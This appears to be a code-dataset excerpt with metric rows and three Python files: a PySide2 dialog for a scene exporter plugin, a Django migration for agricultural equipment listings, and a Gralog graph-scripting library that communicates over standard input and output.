| 28.714286 | 84 | 0.651741 | 193 | 1,608 | 5.26943 | 0.300518 | 0.162242 | 0.058997 | 0.070796 | 0.328417 | 0.208456 | 0.088496 | 0.088496 | 0 | 0 | 0 | 0.015847 | 0.254353 | 1,608 | 55 | 85 | 29.236364 | 0.83236 | 0 | 0 | 0.052632 | 0 | 0 | 0.056592 | 0.030473 | 0 | 0 | 0 | 0 | 0.473684 | 1 | 0.078947 | false | 0.026316 | 0.078947 | 0 | 0.289474 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe68c2686760a20f5158d8a2bc5c4a835377dc27 | 6,801 | py | Python | mapclientplugins/argonsceneexporterstep/ui_configuredialog.py | Kayvv/mapclientplugins.argonsceneexporterstep | 59b0b9cb15660c5747c1a7cba9da0e1eaf0bdf48 | [
"Apache-2.0"
] | null | null | null | mapclientplugins/argonsceneexporterstep/ui_configuredialog.py | Kayvv/mapclientplugins.argonsceneexporterstep | 59b0b9cb15660c5747c1a7cba9da0e1eaf0bdf48 | [
"Apache-2.0"
] | null | null | null | mapclientplugins/argonsceneexporterstep/ui_configuredialog.py | Kayvv/mapclientplugins.argonsceneexporterstep | 59b0b9cb15660c5747c1a7cba9da0e1eaf0bdf48 | [
"Apache-2.0"
] | 3 | 2021-07-26T00:53:24.000Z | 2021-11-17T23:23:11.000Z | # -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'configuredialog.ui'
##
## Created by: Qt User Interface Compiler version 5.15.2
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
class Ui_ConfigureDialog(object):
def setupUi(self, ConfigureDialog):
if not ConfigureDialog.objectName():
ConfigureDialog.setObjectName(u"ConfigureDialog")
ConfigureDialog.resize(510, 342)
self.gridLayout = QGridLayout(ConfigureDialog)
self.gridLayout.setObjectName(u"gridLayout")
self.configGroupBox = QGroupBox(ConfigureDialog)
self.configGroupBox.setObjectName(u"configGroupBox")
self.formLayout = QFormLayout(self.configGroupBox)
self.formLayout.setObjectName(u"formLayout")
self.label0 = QLabel(self.configGroupBox)
self.label0.setObjectName(u"label0")
self.formLayout.setWidget(0, QFormLayout.LabelRole, self.label0)
self.lineEditIdentifier = QLineEdit(self.configGroupBox)
self.lineEditIdentifier.setObjectName(u"lineEditIdentifier")
self.formLayout.setWidget(0, QFormLayout.FieldRole, self.lineEditIdentifier)
self.label_3 = QLabel(self.configGroupBox)
self.label_3.setObjectName(u"label_3")
self.formLayout.setWidget(1, QFormLayout.LabelRole, self.label_3)
self.prefix_lineEdit = QLineEdit(self.configGroupBox)
self.prefix_lineEdit.setObjectName(u"prefix_lineEdit")
self.formLayout.setWidget(1, QFormLayout.FieldRole, self.prefix_lineEdit)
self.label_4 = QLabel(self.configGroupBox)
self.label_4.setObjectName(u"label_4")
self.formLayout.setWidget(3, QFormLayout.LabelRole, self.label_4)
self.timeSteps_lineEdit = QLineEdit(self.configGroupBox)
self.timeSteps_lineEdit.setObjectName(u"timeSteps_lineEdit")
self.formLayout.setWidget(3, QFormLayout.FieldRole, self.timeSteps_lineEdit)
self.label = QLabel(self.configGroupBox)
self.label.setObjectName(u"label")
self.formLayout.setWidget(4, QFormLayout.LabelRole, self.label)
self.initialTime_lineEdit = QLineEdit(self.configGroupBox)
self.initialTime_lineEdit.setObjectName(u"initialTime_lineEdit")
self.formLayout.setWidget(4, QFormLayout.FieldRole, self.initialTime_lineEdit)
self.label_2 = QLabel(self.configGroupBox)
self.label_2.setObjectName(u"label_2")
self.formLayout.setWidget(5, QFormLayout.LabelRole, self.label_2)
self.finishTime_lineEdit = QLineEdit(self.configGroupBox)
self.finishTime_lineEdit.setObjectName(u"finishTime_lineEdit")
self.formLayout.setWidget(5, QFormLayout.FieldRole, self.finishTime_lineEdit)
self.label1 = QLabel(self.configGroupBox)
self.label1.setObjectName(u"label1")
self.formLayout.setWidget(6, QFormLayout.LabelRole, self.label1)
self.horizontalLayout = QHBoxLayout()
self.horizontalLayout.setObjectName(u"horizontalLayout")
self.lineEditOutputDirectory = QLineEdit(self.configGroupBox)
self.lineEditOutputDirectory.setObjectName(u"lineEditOutputDirectory")
self.horizontalLayout.addWidget(self.lineEditOutputDirectory)
self.pushButtonOutputDirectory = QPushButton(self.configGroupBox)
self.pushButtonOutputDirectory.setObjectName(u"pushButtonOutputDirectory")
self.horizontalLayout.addWidget(self.pushButtonOutputDirectory)
self.formLayout.setLayout(6, QFormLayout.FieldRole, self.horizontalLayout)
self.label_5 = QLabel(self.configGroupBox)
self.label_5.setObjectName(u"label_5")
self.formLayout.setWidget(2, QFormLayout.LabelRole, self.label_5)
self.comboBoxExportType = QComboBox(self.configGroupBox)
self.comboBoxExportType.addItem("")
self.comboBoxExportType.addItem("")
self.comboBoxExportType.setObjectName(u"comboBoxExportType")
self.formLayout.setWidget(2, QFormLayout.FieldRole, self.comboBoxExportType)
self.gridLayout.addWidget(self.configGroupBox, 0, 0, 1, 1)
self.buttonBox = QDialogButtonBox(ConfigureDialog)
self.buttonBox.setObjectName(u"buttonBox")
self.buttonBox.setOrientation(Qt.Horizontal)
self.buttonBox.setStandardButtons(QDialogButtonBox.Cancel|QDialogButtonBox.Ok)
self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
QWidget.setTabOrder(self.lineEditIdentifier, self.prefix_lineEdit)
QWidget.setTabOrder(self.prefix_lineEdit, self.comboBoxExportType)
QWidget.setTabOrder(self.comboBoxExportType, self.timeSteps_lineEdit)
QWidget.setTabOrder(self.timeSteps_lineEdit, self.initialTime_lineEdit)
QWidget.setTabOrder(self.initialTime_lineEdit, self.finishTime_lineEdit)
QWidget.setTabOrder(self.finishTime_lineEdit, self.lineEditOutputDirectory)
QWidget.setTabOrder(self.lineEditOutputDirectory, self.pushButtonOutputDirectory)
self.retranslateUi(ConfigureDialog)
self.buttonBox.accepted.connect(ConfigureDialog.accept)
self.buttonBox.rejected.connect(ConfigureDialog.reject)
self.comboBoxExportType.setCurrentIndex(0)
QMetaObject.connectSlotsByName(ConfigureDialog)
# setupUi
def retranslateUi(self, ConfigureDialog):
ConfigureDialog.setWindowTitle(QCoreApplication.translate("ConfigureDialog", u"Configure Step", None))
self.configGroupBox.setTitle("")
self.label0.setText(QCoreApplication.translate("ConfigureDialog", u"identifier: ", None))
self.label_3.setText(QCoreApplication.translate("ConfigureDialog", u"Prefix : ", None))
self.label_4.setText(QCoreApplication.translate("ConfigureDialog", u"Time Steps : ", None))
self.label.setText(QCoreApplication.translate("ConfigureDialog", u"Initial Time : ", None))
self.label_2.setText(QCoreApplication.translate("ConfigureDialog", u"Finish Time : ", None))
self.label1.setText(QCoreApplication.translate("ConfigureDialog", u"Output directory:", None))
self.pushButtonOutputDirectory.setText(QCoreApplication.translate("ConfigureDialog", u"...", None))
self.label_5.setText(QCoreApplication.translate("ConfigureDialog", u"Export type:", None))
self.comboBoxExportType.setItemText(0, QCoreApplication.translate("ConfigureDialog", u"webgl", None))
self.comboBoxExportType.setItemText(1, QCoreApplication.translate("ConfigureDialog", u"thumbnail", None))
# retranslateUi
| 44.45098 | 113 | 0.723276 | 642 | 6,801 | 7.5919 | 0.190031 | 0.06032 | 0.07222 | 0.092532 | 0.24723 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012017 | 0.155712 | 6,801 | 152 | 114 | 44.743421 | 0.836816 | 0.034113 | 0 | 0.021053 | 1 | 0 | 0.088208 | 0.007507 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021053 | false | 0 | 0.031579 | 0 | 0.063158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe6de4a21365edf7ffd30ec000387c588b119366 | 9,086 | py | Python | equipments/migrations/0001_initial.py | fagrimacs/fagrimacs_production | ea1a8f92c41c416309cc1fdd8deb02f41a9c95a0 | [
"MIT"
] | null | null | null | equipments/migrations/0001_initial.py | fagrimacs/fagrimacs_production | ea1a8f92c41c416309cc1fdd8deb02f41a9c95a0 | [
"MIT"
] | 8 | 2020-09-16T05:28:33.000Z | 2020-09-28T06:29:03.000Z | equipments/migrations/0001_initial.py | fagrimacs/fagrimacs_production | ea1a8f92c41c416309cc1fdd8deb02f41a9c95a0 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.7 on 2020-09-18 05:52
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Equipment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(choices=[(None, 'Please select'), ('tractor', 'Tractor'), ('implement', 'Implement'), ('other_equipment', 'Other Equipment')], max_length=100, verbose_name='What Equipment you want to Add?')),
],
),
migrations.CreateModel(
name='ImplementCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='implements_category')),
],
options={
'verbose_name_plural': 'Implement Categories',
},
),
migrations.CreateModel(
name='Phone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone', models.CharField(max_length=18)),
],
),
migrations.CreateModel(
name='TractorCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='tractor_category')),
],
options={
'verbose_name_plural': 'Tractor Categories',
},
),
migrations.CreateModel(
name='Tractor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('drive_type', models.CharField(choices=[(None, 'Please Select'), ('two wheel drive', 'Two wheel Drive'), ('four wheel drive', 'Four wheel Drive')], max_length=100, verbose_name='What Drive Type')),
('name', models.CharField(help_text='eg. John Deere 6190R', max_length=200, verbose_name='Name/Models of Tractor')),
('mode_of_transmission', models.CharField(choices=[(None, 'Please Select'), ('gear', 'Gear'), ('manual', 'Manual'), ('hydrostatic', 'Hydrostatic'), ('turbochanged', 'Turbocharged')], max_length=100, verbose_name='Mode of Transmission')),
('engine_hp', models.PositiveIntegerField(verbose_name='Engine Horse Power (eg. 75hp)')),
('drawbar_hp', models.PositiveIntegerField(verbose_name='Drawbar Horse Power (eg. 65hp)')),
('pto_hp', models.PositiveIntegerField(verbose_name='PTO Horse Power (eg. 85hp)')),
('hydraulic_capacity', models.CharField(help_text='Use a SI units of gpm or psi', max_length=100, verbose_name='Hydaulic capacity (gallon per minutes(gpm) or psi-pound per square inchies)')),
('type_of_hitching', models.CharField(choices=[(None, 'Please Select'), ('two point hitches', 'Two-point hitches'), ('three point hitches', 'Three-point hitches')], max_length=100, verbose_name='What is Hitching type?')),
('cab', models.BooleanField(default=False, verbose_name='Does have a cab?')),
('rollover_protection', models.BooleanField(default=False, verbose_name='Does have the rollover protection?')),
('fuel_consumption', models.PositiveIntegerField(verbose_name='Fuel consumption (gallon per hour on operation)')),
('attachment_mode', models.CharField(choices=[(None, 'Please select'), ('frontend loader', 'frontend loader'), ('backhoe', 'Backhoe'), ('both', 'Both')], max_length=100, verbose_name='What mode of attachment?')),
('operator', models.BooleanField(default=False, verbose_name='Do you have an operator(s)?')),
('file', models.FileField(help_text='Upload quality picture of real tractor you have, only 5 picture.', upload_to='tractors_photos/', verbose_name='Upload the Tractor pictures')),
('other_informations', models.TextField(blank=True, verbose_name='Describe your Tractor')),
('price_hour', models.PositiveIntegerField(verbose_name='Specify the price per Hour in TShs.')),
('price_hectare', models.PositiveIntegerField(verbose_name='Specify the price per Hectare')),
('farm_services', multiselectfield.db.fields.MultiSelectField(choices=[('soil cultivations', 'Soil cultivations'), ('planting', 'Planting'), ('haversting/post-haversting', 'Haversting/Post-Haversting'), ('fertilizing & pest-control', 'Fertilizing & Pest-control'), ('drainage & irrigation', 'Drainage & Irrigation'), ('loading', 'Loading'), ('hay making', 'Hay making'), ('miscellaneous', 'Miscellaneous')], max_length=135, verbose_name='What are farming service(s) do you offer?')),
('agree_terms', models.BooleanField(default=False, verbose_name='Do your Accept our Terms and Conditions?')),
('status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved')], default='pending', max_length=100)),
('tractor_type', models.ForeignKey(on_delete=models.SET('others'), to='equipments.TractorCategory', verbose_name='What type of Tractor?')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='ImplementSubCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='equipments.ImplementCategory')),
],
options={
'verbose_name_plural': 'Implement Subcategories',
},
),
migrations.CreateModel(
name='Implement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('name', models.CharField(max_length=100, verbose_name='Name/Models of Implement')),
('width', models.PositiveIntegerField(help_text='SI UNITS in metre', verbose_name='Width of the Implement')),
('weight', models.PositiveIntegerField(help_text='SI UNITS in KG', verbose_name='Weight of the Implement')),
('operation_mode', models.CharField(choices=[(None, 'Please Select'), ('tractor drive', 'Tractor drive'), ('self-propelled', 'Self-propelled')], max_length=100, verbose_name='What is mode of operation?')),
('pto', models.PositiveIntegerField(verbose_name='What is Horse Power required for Operation?')),
('hydraulic_capacity', models.CharField(max_length=100, verbose_name='What is Hydaulic capacity required to lift?')),
('operator', models.BooleanField(verbose_name='Do you have an operator(s)?')),
('file', models.FileField(help_text='Upload quality picture of real implement you have, only 5 pictures.', upload_to='implements_photos/', verbose_name='Upload the Implement pictures')),
('other_informations', models.TextField(blank=True, verbose_name='Describe your Implement')),
('price_hour', models.PositiveIntegerField(verbose_name='Specify the price per Hour')),
('price_hectare', models.PositiveIntegerField(verbose_name='Specify the price per Hectare')),
('agree_terms', models.BooleanField(default=False, verbose_name='Do your Accept our Terms and Conditions?')),
('status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved')], default='pending', max_length=100)),
('category', models.ForeignKey(on_delete=models.SET('others'), to='equipments.ImplementCategory', verbose_name='What category of your Implement')),
('subcategory', models.ForeignKey(on_delete=models.SET('others'), to='equipments.ImplementSubCategory', verbose_name='What is subcategory of your Implement')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 75.716667 | 499 | 0.637134 | 959 | 9,086 | 5.893639 | 0.224192 | 0.08758 | 0.029724 | 0.030255 | 0.587226 | 0.509377 | 0.487615 | 0.402335 | 0.382166 | 0.355096 | 0 | 0.010819 | 0.216707 | 9,086 | 119 | 500 | 76.352941 | 0.783336 | 0.004953 | 0 | 0.473214 | 1 | 0 | 0.323708 | 0.018254 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035714 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe70b613f1b25d8770820b6d2050c23b8fcae093 | 47,242 | py | Python | gralog-fx/src/main/java/gralog/gralogfx/piping/scripts/Gralog.py | gralog/gralog | 0ab2e3137b83950cdc4e9234d4df451a22034285 | [
"Apache-2.0",
"BSD-3-Clause"
] | 12 | 2016-11-11T13:24:48.000Z | 2022-01-27T19:49:36.000Z | gralog-fx/src/main/java/gralog/gralogfx/piping/scripts/Gralog.py | gralog/gralog | 0ab2e3137b83950cdc4e9234d4df451a22034285 | [
"Apache-2.0",
"BSD-3-Clause"
] | 6 | 2017-01-05T14:23:59.000Z | 2018-09-20T19:14:57.000Z | gralog-fx/src/main/java/gralog/gralogfx/piping/scripts/Gralog.py | gralog/gralog | 0ab2e3137b83950cdc4e9234d4df451a22034285 | [
"Apache-2.0",
"BSD-3-Clause"
] | 2 | 2019-11-25T18:17:00.000Z | 2020-06-04T21:38:50.000Z | #!/usr/bin/env python3
import sys
from random import randint
import os
try:
import networkx as nx
except:
print("gPrint#-1#" + "netwrokx not installed for " + sys.executable)
sys.stdout.flush()
try:
import igraph as ig
except:
print("gPrint#-1#" + "igraph not installed for " + sys.executable)
import xml.etree.cElementTree as ET
import math
# debugging = False
class Vertex:
def __init__(self, graph, vid):
self.sourced = False
self.id = int(vid)
self.graph = graph
self.properties = dict()
self.properties["id"] = None
self.properties["label"] = None
self.properties["color"] = None
self.properties["strokeColor"] = None
self.properties["shape"] = None
self.properties["coordinates"] = None
self.incomingEdges = []
self.outgoingEdges = []
self.incidentEdges = []
self.wasSourced = False
def sourceProperties(self, stringFromGralog):
self.sourced = True
strings = stringFromGralog.split("#")
for string in strings:
propVal = string.split("=")
valueType = ""
try:
prop = propVal[0]
valueType = propVal[1]
except:
pass
try:
valueType = valueType.split("|")
val = valueType[0]
typ = valueType[1]
castedValue = self.graph.castValueToType(val, typ)
self.properties[prop] = castedValue
except:
pass
def getId(self):
return self.id
def getLabel(self):
if not self.wasSourced:
self.source()
return self.properties["label"]
def setLabel(self, label):
label = str(label)
self.properties["label"] = label
self.graph.setVertexLabel(self.id, label)
def setCoordinates(self, coordinates):
co = self.properties["coordinates"]
x = coordinates[0]
y = coordinates[1]
        if co is None:
            co = (None, None)
        if x is None:
            x = co[0]
        if y is None:
            y = co[1]
newCoordinates = (x, y)
self.properties["coordinates"] = newCoordinates
self.graph.setVertexCoordinates(self.id, newCoordinates)
def setFillColor(self, colorHex=-1, colorRGB=-1):
self.setColor(colorHex, colorRGB)
def getFillColor(self):
return self.getColor()
def getColor(self):
if not self.wasSourced:
self.source()
return self.properties["color"]
def setColor(self, colorHex=-1, colorRGB=-1):
        if colorHex != -1:
            self.properties["color"] = colorHex
        elif colorRGB != -1:
            self.properties["color"] = colorRGB
else:
return
self.graph.setVertexFillColor(self.id, colorHex, colorRGB)
def setStrokeColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["strokeColor"] = colorHex
elif colorRGB != -1:
self.properties["strokeColor"] = colorRGB
else:
return
self.graph.setVertexStrokeColor(self.id, colorHex, colorRGB)
def getStrokeColor(self):
if not self.sourced:
self.source()
return self.properties["strokeColor"]
def setRadius(self, radius):
self.properties["radius"] = radius
self.properties["width"] = radius
self.properties["height"] = radius
self.graph.setVertexRadius(self.id, radius)
def setWidth(self, width):
self.properties["width"] = width
self.graph.setVertexWidth(self.getId(), width)
def setHeight(self, height):
self.properties["height"] = height
self.graph.setVertexHeight(self.getId(), height)
def setShape(self, shape):
self.properties["shape"] = shape
self.graph.setVertexShape(self.id, shape)
def setProperty(self, otherProperty, value):
self.properties[otherProperty] = value
self.graph.setVertexProperty(self.id, otherProperty, value)
def getProperty(self, otherProperty):
        if not self.wasSourced:
self.source()
return self.properties[otherProperty]
def get(self, prop):
        if not self.wasSourced:
self.source()
return self.properties[prop]
def getNeighbours(self):
return self.graph.getNeighbours(self.id)
def getOutgoingNeighbours(self):
return self.graph.getOutgoingNeighbours(self.id)
def getIncomingNeighbours(self):
return self.graph.getIncomingNeighbours(self.id)
def getOutgoingEdges(self):
return self.graph.getOutgoingEdges(self.id)
def getIncomingEdges(self):
return self.graph.getIncomingEdges(self.id)
def getIncidentEdges(self):
return self.graph.getIncidentEdges(self.id)
def delete(self):
return self.graph.deleteVertex(self)
def connect(self, v1, edgeId=-1):
return self.graph.addEdge(self, v1, edgeId)
def getAllEdgesBetween(self, vertex2):
return self.graph.getAllEdgesBetween((self.id, vertex2))
def source(self):
return self.graph.getVertex(self)
def __str__(self):
return str(self.getId())
    # Open question: when fetching a vertex, should we also fetch its
    # neighbours and incident edges? That is all very costly and leads to
    # the paradigm of simply mirroring the whole graph in Python.
class Edge:
# private methods
def __init__(self, graph, eid):
self.sourced = False
self.id = int(eid) #if -2, then imported without id like in TGF
self.graph = graph
self.properties = dict()
self.properties["id"] = None
self.properties["label"] = None
self.properties["color"] = None
self.properties["weight"] = None
self.properties["contour"] = None
self.properties["source"] = None
self.properties["target"] = None
self.wasSourced = False
def sourceProperties(self, stringFromGralog):
self.sourced = True
strings = stringFromGralog.split("#")
for string in strings:
propVal = string.split("=")
try:
prop = propVal[0]
valueType = propVal[1]
valueType = valueType.split("|")
val = valueType[0]
typ = valueType[1]
self.properties[prop] = self.graph.castValueToType(val, typ)
            except (IndexError, ValueError):
                # ignore malformed "prop=val|type" fragments
                pass
    def setTarget(self, target):  # internal: set when sourcing edges; don't call directly
self.properties["target"] = target
def setSource(self, source):
self.properties["source"] = source
# public methods
def getId(self):
return self.id
def setLabel(self, label):
label = str(label)
self.properties["label"] = label
self.graph.setEdgeLabel(self.id, label)
def getLabel(self):
if not self.sourced:
self.source()
return self.properties["label"]
def setColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["color"] = colorHex
elif colorRGB != -1:
self.properties["color"] = colorRGB
else:
return
self.graph.setEdgeColor(self.id, colorHex, colorRGB)
def getColor(self):
if not self.sourced:
self.source()
return self.properties["color"]
def setWeight(self, weight):
self.properties["weight"] = float(weight)
self.graph.setEdgeWeight(self.id, weight)
def getWeight(self):
if not self.sourced:
self.source()
return self.properties["weight"]
def setThickness(self, thickness):
self.properties["thickness"] = float(thickness)
self.graph.setEdgeThickness(self.id, thickness)
def getThickness(self):
if not self.sourced:
self.source()
return self.properties["thickness"]
def setContour(self, contour):
self.properties["contour"] = contour
self.graph.setEdgeContour(self.id, contour)
def getContour(self):
if not self.sourced:
self.source()
return self.properties["contour"]
def getSource(self):
if not self.sourced:
self.source()
return self.properties["source"]
def getTarget(self):
if not self.sourced:
self.source()
return self.properties["target"]
def setProperty(self, otherProperty, value):
self.properties[otherProperty] = value
self.graph.setEdgeProperty(self, otherProperty, value)
def getProperty(self, otherProperty):
if not self.sourced:
self.source()
return self.properties[otherProperty]
    def get(self, prop):
        if not self.sourced:
            self.source()
        return self.properties[prop]
def delete(self):
return self.graph.deleteEdge(self.id)
def source(self):
return self.graph.getEdge(self)
def getAdjacentEdges(self):
return self.graph.getAdjacentEdges(self.id)
    def __str__(self):
        source = self.getSource().getId()
        target = self.getTarget().getId()
        return "({:},{:})".format(source, target)
def rgbFormatter(colorRGB):
r = colorRGB[0]
g = colorRGB[1]
b = colorRGB[2]
s = "rgb"
s += "(" + str(r).rstrip() + "," + \
str(g).rstrip() + "," + str(b).rstrip() + ")"
return s.rstrip()
def hexFormatter(colorHex):
s = "hex"
if colorHex[0] == "#":
colorHex = colorHex[1:]
s += "("+str(colorHex).rstrip() + ")"
return s.rstrip()
def vertexId(vertex):
if isinstance(vertex, Vertex):
return vertex.getId()
return vertex
def edgeId(edge):
if isinstance(edge, Edge):
return edge.getId()
return edge
def extractIdFromProperties(stringFromGralog):
strings = stringFromGralog.split(",")
for string in strings:
propVal = string.split("=")
if propVal[0] == "id":
return propVal[1]
return None
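extractIdFromProperties scans a comma-separated key=value list for the "id" entry. A minimal standalone sketch of that scan (the snake_case name here is re-declared for illustration, not part of the API):

```python
# Standalone copy of the "key=value" scan, so the snippet runs on its own.
def extract_id_from_properties(string_from_gralog):
    for part in string_from_gralog.split(","):
        prop_val = part.split("=")
        if prop_val[0] == "id":
            return prop_val[1]
    return None

assert extract_id_from_properties("id=7,label=a") == "7"
assert extract_id_from_properties("label=a") is None
```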
def edgeSplitter(edge):
if type(edge) == tuple and len(edge) == 2: # edge as defined by start, end nodes
return str(vertexId(edge[0])).rstrip()+","+str(vertexId(edge[1])).rstrip()
if type(edge) == int: # edge is given by id
return str(edge).rstrip()
return str(edge.getId()).rstrip()#edge has type Edge
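The color formatters above produce the `rgb(...)`/`hex(...)` strings the wire protocol expects. A quick self-contained illustration (standalone snake_case copies, not the API functions themselves):

```python
# Standalone copies of the two color formatters for demonstration.
def rgb_formatter(color_rgb):
    r, g, b = color_rgb
    return "rgb({},{},{})".format(r, g, b)

def hex_formatter(color_hex):
    # drop a leading '#' if present, as the original does
    return "hex({})".format(str(color_hex).lstrip("#"))

assert rgb_formatter((255, 0, 0)) == "rgb(255,0,0)"
assert hex_formatter("#1a2b3c") == "hex(1a2b3c)"
```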
class Graph:
def __init__(self, format="Undirected Graph"):
# perform analysis of graph
self.id_to_vertex = dict()
self.id_to_edge = dict()
self.lastIndex = -1
self.id = -1
self.variablesToTrack = dict()
        if format is None or format.lower() == "none":
            # attach to the graph currently open in Gralog
            print("useCurrentGraph")
sys.stdout.flush()
self.lastIndex = -1
self.id = sys.stdin.readline()
self.getGraph("gtgf")
else:
print(format)
sys.stdout.flush()
self.id = sys.stdin.readline()
# helper functions
def castValueToType(self, val, typ):
if typ == "float":
return float(val)
if typ == "int":
return int(val)
        if typ == "bool":
            # bool("false") would be True, so compare the text instead
            return str(val).lower() == "true"
if typ == "string":
return str(val)
if typ == "vertex":
return self.getVertexOrNew(val)
return val
def getVertexOrNew(self, currId):
v = currId
if (isinstance(currId, str)):
currId = int(currId)
if (isinstance(currId, int)):
if currId in self.id_to_vertex:
v=self.id_to_vertex[currId]
else:
v=Vertex(self, currId)
self.id_to_vertex[currId] = v
return v
    def getEdgeOrNew(self, currId):
        if type(currId) == tuple:
            # resolve a (source, target) pair to an edge id first
            eid = self.getEdgeIdByEndpoints(currId)
            return self.getEdgeOrNew(int(eid))
        if isinstance(currId, Edge):
            return currId
        try:
            return self.id_to_edge[int(currId)]
        except (KeyError, ValueError):
            return Edge(self, currId)
def termToEdge(self, term):
endpoints = term.split(",")
eid = int(endpoints[0])
e = self.id_to_edge[eid]
e.sourceProperties(endpoints[0])
sourceId = int(endpoints[1])
source = self.getVertexOrNew(sourceId)
targetId = int(endpoints[2])
target = self.getVertexOrNew(targetId)
e.setSource(source)
e.setTarget(target)
return e
    @staticmethod
    def representsInt(s):
        try:
            int(s)
            return True
        except ValueError:
            return False
def edgifyTGFCommand(self, line):
line = line.strip()
endpoints = line.split(" ")
v1String = endpoints[0]
v1 = self.getVertexOrNew(int(v1String))
v2String = endpoints[1]
v2 = self.getVertexOrNew(int(v2String))
e = self.getEdgeOrNew(-2)
e.setSource(v1)
e.setTarget(v2)
    def vertexifyTGFCommand(self, line):
        line = line.strip()
        vString = line.split(" ")[0]  # first token is the vertex id
        v = self.getVertexOrNew(int(vString))
        self.id_to_vertex[v.getId()] = v
def edgifyGTGFCommand(self, line):
line = line.strip()
endpoints = line.split(" ")
v1String = endpoints[0]
v1 = self.getVertexOrNew(int(v1String))
v2String = endpoints[1]
v2 = self.getVertexOrNew(int(v2String))
eid = int(endpoints[2])
e = self.getEdgeOrNew(eid)
e.setSource(v1)
e.setTarget(v2)
self.id_to_edge[eid] = e
def vertexifyGTGFCommand(self, line):
self.vertexifyTGFCommand(line)
def getEdgeIdByEndpoints(self, endpoints):
line = "getEdgeIdByEndpoints#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(endpoints)
print(line.rstrip())
sys.stdout.flush()
edgeId = sys.stdin.readline().rstrip()
return edgeId
def getVertex(self, vertex):
line = "getVertex#"+str(self.id).rstrip() + "#"
line = line + str(vertex).rstrip()
print (line.rstrip())
sys.stdout.flush()
vertexTuple = sys.stdin.readline().rstrip()
vertex.sourceProperties(vertexTuple)
return vertex
def getEdge(self, edge):
line = "getEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print (line.rstrip())
sys.stdout.flush()
edgeTuple = sys.stdin.readline().rstrip()
edge.sourceProperties(edgeTuple)
return edge
# end helper functions
# Graph Manipulating Functions
def addVertex(self, vertexId=-1, pos=(None, None)):
# return: Vertex object with id
        line = "addVertex#" + str(self.id).rstrip()
        x = -1
        y = -1
        if type(vertexId) == tuple and pos == (None, None):
            # the position was passed as the first positional argument
            x = vertexId[0]
            y = vertexId[1]
            vertexId = -1
        else:
            x = pos[0]
            y = pos[1]
if vertexId != -1:
line += "#"+str(vertexId).rstrip()
if x != None and y != None:
line += "#" + str(x).rstrip() + "#" + str(y).rstrip()
print(line)
sys.stdout.flush()
vid = sys.stdin.readline()
v = Vertex(self, vid)
self.id_to_vertex[v.getId()] = v
return v
def deleteVertex(self, v):
edges = self.getIncidentEdges(v)
for e in edges:
del self.id_to_edge[e.getId()]
v = vertexId(v)
del self.id_to_vertex[v]
print("deleteVertex#" + str(self.id).rstrip() + "#" + str(v))
sys.stdout.flush()
def addEdge(self, sourceVertex, targetVertex, edgeId = -1):
# return: Edge object with id only
sourceVertex = vertexId(sourceVertex)
targetVertex = vertexId(targetVertex)
idSubString = ""
if not edgeId == -1:
idSubString = "#"+str(edgeId)
line = "addEdge#"+str(self.id).rstrip() + "#" + str(sourceVertex).rstrip() + \
"#" + str(targetVertex).rstrip() + idSubString.rstrip()
print(line.rstrip())
sys.stdout.flush()
